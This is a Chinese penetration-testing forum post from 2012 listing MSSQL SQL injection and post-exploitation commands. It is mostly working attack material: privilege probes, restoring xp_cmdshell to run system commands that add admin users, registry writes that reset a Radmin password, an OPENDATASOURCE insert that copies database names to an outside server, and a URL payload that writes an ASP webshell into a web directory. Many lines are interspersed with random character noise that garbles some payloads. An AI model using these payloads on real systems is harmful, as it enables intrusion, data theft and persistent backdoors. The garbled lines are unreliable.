找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 常用的一些注入命令
返回列表 发新帖
查看: 2542|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
: }+ @; c- r: Xand 1=(Select IS_MEMBER('db_owner'))
" q0 i9 g' i6 T# M. D, o& m9 U1 sAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--% ]% m8 v, n9 W$ U) k% s

9 F* [1 M5 b3 C; v5 f+ v& \& J8 k//检测是否有读取某数据库的权限' d$ x6 T3 [. E2 V8 c
and 1= (Select HAS_DBACCESS('master'))! A, r" N5 h1 s" J4 f$ _3 }
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
4 F! w- O, F5 S, p+ V
2 V) D5 }. E8 C1 v* n; }: J5 U
% W+ _; C: ^: E# x+ Y5 z数字类型8 y: a- |& ?7 N( G3 x% V4 M3 b
and char(124)%2Buser%2Bchar(124)=0
) G( x1 U+ x' t0 g# Q3 z
/ ^$ B& T: d; q字符类型% B. ^) s; c7 S; l
' and char(124)%2Buser%2Bchar(124)=0 and ''='
( ^7 f% {. @9 |! |4 i8 `- `3 H4 v( B
7 t5 y; s( e3 O/ s2 I* b搜索类型
  F5 ^3 v( l( m2 {+ u1 n4 k2 d: l' and char(124)%2Buser%2Bchar(124)=0 and '%'='- Y+ A! }/ F! g1 m% t$ \1 R
0 A' D4 B' d$ s. J' A. R- C
爆用户名
- a' x8 g7 b2 j. e- Q9 _% Band user>07 V4 T$ l, I2 U3 w% c
' and user>0 and ''='
( p% b% F- D! z* e4 |8 @, t/ V# b, p: M5 d2 ~1 F) H# L
检测是否为SA权限
7 _# U+ U* h- r& Oand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
; \) B7 Y5 E- _: g0 f' @' D; C* ^1 iAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --# _& f8 @, N7 H) x! T
) F) X- X' y5 P8 I6 F
检测是不是MSSQL数据库
, \; c. {! Q6 V4 b) g2 pand exists (select * from sysobjects);--* S/ h! E, T/ l3 K2 w( t

+ y( [; k  L8 V# \检测是否支持多行' Z# ~5 W/ ]! A8 `  }/ t# w$ N4 U
;declare @d int;--$ d5 ^8 X; z( h& u) {

. p0 i: F+ z1 \5 O恢复 xp_cmdshell' d  J6 v. g, u) R* O$ B( }
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
; r# f) q5 V) z8 c9 n* G$ a
! n& ^6 ^* n* ?  R( ^& N
3 s2 Z0 N1 k- {* E# Jselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
5 m+ X2 v' I, ?9 A% a8 W- p! O) e- {7 U( T6 z
//-----------------------! ]' k7 O3 Q/ K) Q) ]' n
//       执行命令
8 z! X; T( q# w3 v//-----------------------
! \' m4 _( U+ r2 j) ?; ^" N( y2 i首先开启沙盘模式:' r1 B; ?  e5 t3 _$ C, j7 S9 h
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 D. o# \2 b+ M
* |) @1 N) s6 W  W1 I1 M; F) H
然后利用jet.oledb执行系统命令3 d0 g1 W5 H+ z9 r+ U
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), t9 [5 d8 Z0 b4 t

- y8 }2 ?0 M! u( W" s2 s执行命令
/ ~: N  O  j& o+ A, K* k5 Z;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--5 h+ N& Z( i1 }; V) [9 E* a: Y

1 L8 E* j  t& t: v9 eEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
  i' S* T5 X3 f" m0 I8 ?8 Q- ?
+ w, \: D* x; g3 ]& X& u' o判断xp_cmdshell扩展存储过程是否存在:) t& q( G; i! ?  X: C1 u2 W- m
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')9 j- W  z+ Z+ _, r4 ]7 I9 u

, Q  P, R5 P# ~: P! e& L5 a9 c3 G写注册表
6 p, F& m$ u7 p  Mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
1 N6 n5 }/ d5 v9 J
4 y% V4 n. `# T2 x% ^# sREG_SZ
" _# z0 b/ u$ j
& H4 [' [- _/ Y) G! }; H. B读注册表9 G1 ~# q  V6 _* p$ S! l
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
9 e# U- W3 k) p, b( W0 m- a6 K; m$ k, s0 }
读取目录内容
* Y  L; F( O* e6 R  L! Yexec master..xp_dirtree 'c:\winnt\system32\',1,1
6 m9 B7 @' R9 J# r: F& a4 I) r5 |( {; N5 q& I

8 ]7 i% K, |3 M) r数据库备份1 s- c8 p8 X7 ^; l1 P# B# _
backup database pubs to disk = 'c:\123.bak'4 k) R- y* D; I9 R

# Y1 ?9 p; r! v$ Y* A' ?3 ~//爆出长度
" G7 K& A8 |# J/ d3 ^, QAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--- o3 p6 ?9 k8 U, e/ n: h* S

( [. {# k$ {& |5 x* z; R0 G7 u, B/ L: {9 y! F' z7 n8 f/ W' z7 k/ u

% X9 g' T7 r9 a3 m更改sa口令方法:用sql综合利用工具连接后,执行命令:. H; K2 Y- U1 p1 g8 W# [) y
exec sp_password NULL,'新密码','sa'' X% c& e! B6 B& c3 L0 c

  o8 {! A* [) }9 |6 w: Y添加和删除一个SA权限的用户test:
4 B' Y. \5 ~8 _  `) ?3 G, K7 Fexec master.dbo.sp_addlogin test,95307726 B; F/ ^8 i) M' c/ U+ l4 o
exec master.dbo.sp_addsrvrolemember test,sysadmin
) A% M) I/ W1 V: z; R" T4 U1 O: G: @" F, Q* {  Q
删除扩展存储过过程xp_cmdshell的语句:
3 `' K+ t3 z+ N8 W. [* |( C- Dexec sp_dropextendedproc 'xp_cmdshell'5 M3 d. A' D% U+ E; Y

5 t: ?1 u2 k! _0 b& }9 n  Y添加扩展存储过过程; K& C1 e! T* J: J6 O! R* o! {. h0 I
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'1 ]  h0 r: E) V+ T$ V+ k
GRANT exec On xp_proxiedadata TO public! {! T# C2 |' X' K' K

. y4 R; F6 c% v2 I$ D; c3 }: W' Q3 ]* P, \7 p7 n: X& T9 T
停掉或激活某个服务。) y7 O1 C' L  Z) v9 |

1 n/ |- Q2 e3 D) Z, Iexec master..xp_servicecontrol 'stop','schedule'
& Q, Z* `0 ~8 T- x& iexec master..xp_servicecontrol 'start','schedule'' r/ G  x$ c( x& \' e5 Z5 I

/ x% @) a9 |( I2 qdbo.xp_subdirs. {! }; F  _0 O( p* q

9 }* z. a9 ~% i$ T" R: h* J只列某个目录下的子目录。7 t2 R& D( `2 @3 s! e0 |
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 x1 A2 P& o. ^4 T. c* Z, k3 L$ U3 |0 B: z
dbo.xp_makecab' _- d# k" D1 b' _& v5 v9 `/ D

; r& L; `& l. ?; W+ T将目标多个档案压缩到某个目标档案之内。
; r) J, `# ~( s7 C+ i& P所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。: j- s2 w1 b5 Q4 X6 K8 S/ E% u

; \+ H& S* C* k' _3 d) [, ddbo.xp_makecab: D8 ~" k7 G' C: |, Z7 ^& ]
'c:\test.cab','mszip',1,4 ?# h. W, z* f( Y# I( f
'C:\Inetpub\wwwroot\SQLInject\login.asp',, U; ~" D# X0 [! l2 S0 G# B
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp') k$ I% f% L7 l1 K( U2 q, r

! ?5 b: G* T1 B5 K- Hxp_terminate_process
  r5 C! n# ]9 v! I
1 @0 ]  w& t) m) ^; k; U停掉某个执行中的程序,但赋予的参数是 Process ID。
, C7 Y: ~& y3 x. s) ^; U' R利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID9 z5 P- X+ z2 }. O* T9 U0 w& T
, p6 q+ i% m" l8 G) Y
xp_terminate_process 24845 r7 L5 v. d" S: f: Y/ P1 I

. t- k/ F1 k5 b% k& pxp_unpackcab9 u1 [' F* r- J' c
4 t* _0 f7 T4 Q, S2 ^
解开压缩档。  }: e  `. E0 v7 Q" ^
+ g% P/ P7 o1 V2 A! H- B9 T3 I
xp_unpackcab 'c:\test.cab','c:\temp',1  @* f7 ~% R# L5 c& w% O8 T* I
7 u$ q" Y( N4 x8 J; o
7 S5 p( P4 t4 `* k+ p. K
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 O. `  @5 q/ g( S, s+ _

/ h% T' l# j( ]* C/ y/ R8 L4 j% S/ _create database lcx;! s6 j- U$ l7 O
Create TABLE ku(name nvarchar(256) null);
. t6 Y8 b" V/ H& T4 R5 lCreate TABLE biao(id int NULL,name nvarchar(256) null);
3 M/ C! q/ r2 K4 \' k" e. J) B6 B6 A0 M7 A8 s+ @) q2 f3 H2 C
//得到数据库名
4 e. d& x, E: H% R- a4 ]% Pinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
8 D& s( ^' T' y! A7 S3 q- a* I, U; p9 [2 {8 s

! U8 M  c7 [, B: [% k  _# k//在Master中创建表,看看权限怎样
1 n$ H% g* y/ `) w+ V% a# b& XCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--4 }& S( u- G5 L, {5 K; L8 [
0 J) z( P* s: Z+ ~
用 sp_makewebtask直接在web目录里写入一句话马:
3 I3 z$ I* f+ j) [http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
0 M. S7 d6 \4 U1 P4 [8 M$ I4 t+ [6 K3 Y# V
//更新表内容$ Q8 ~+ Y$ f4 k1 |
Update films SET kind = 'Dramatic' Where id = 123
: u9 C) S! S. `  X0 i' ?9 e8 g
7 O  b% i3 n% O6 c5 o, S5 q8 H8 V7 ^) `//删除内容8 P) _; L( x+ r* y3 A
delete from table_name where Stockid = 3
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表